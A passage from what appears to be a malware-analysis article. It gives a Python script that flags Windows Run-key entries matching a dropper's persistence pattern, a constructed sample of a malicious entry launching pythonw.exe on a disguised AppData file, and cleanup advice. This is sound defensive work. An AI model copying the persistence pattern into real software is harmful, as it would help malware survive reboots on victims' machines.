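    reasons: List[str] = []
    m = RUN_VALUE.match(command)
    if not m:
        return 0, reasons
    reasons.append("Run value launches a Python interpreter")
    if name in DROPPER_NAMES:
        reasons.append(f"value name '{name}' is from the dropper's list")
    loc = APPDATA_DIR.search(m.group("script"))
    if loc:
        reasons.append("script sits directly under an AppData subfolder")
        sub, fname = loc.group("sub"), loc.group("file")
        stem, _, suffix = fname.partition(".")
        if stem == sub and suffix in DROPPER_NAMES:
            reasons.append(f"file name '{fname}' is '<folder>.<dropper name>'")
    return len(reasons), reasons


def suspicious_run_entries(entries: Dict[str, str], threshold: int = 3) -> Dict[str, List[str]]:
    """Filter a {value_name: command} map down to entries scoring at least `threshold`."""
    flagged: Dict[str, List[str]] = {}
    for name, command in entries.items():
        score, reasons = score_run_value(name, command)
        if score >= threshold:
            flagged[name] = reasons
    return flagged


def read_run_values() -> Dict[str, str]:
    """Read HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run; empty dict off Windows."""
    if sys.platform != "win32":
        return {}
    import winreg
    values: Dict[str, str] = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                        r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run") as key:
        i = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:
                break
            values[name] = str(data)
            i += 1
    return values


# Constructed sample entries: one benign, one shaped exactly like the dropper's.
SAMPLE_RUN = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "SecurityCenter": r'"C:\Users\alice\AppData\Local\Programs\Python\Python311\pythonw.exe" '
                      r'"C:\Users\alice\AppData\Roaming\Discord\Discord.System.IO"',
}

if __name__ == "__main__":
    live = read_run_values()
    for name, reasons in suspicious_run_entries(live or SAMPLE_RUN).items():
        print(name)
        for r in reasons:
            print("  -", r)
```

On an infected host, also check the dropped file itself: it is plain Python source despite the missing .py extension, and its contents are whatever /grb served. Deleting the Run value and the file, and killing the pythonw.exe process that has it open, removes this stage's persistence.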

The final payload seems to be an info stealer, but I will save the full analysis of it for the next article. Hope you enjoyed this one, and stay safe ❤
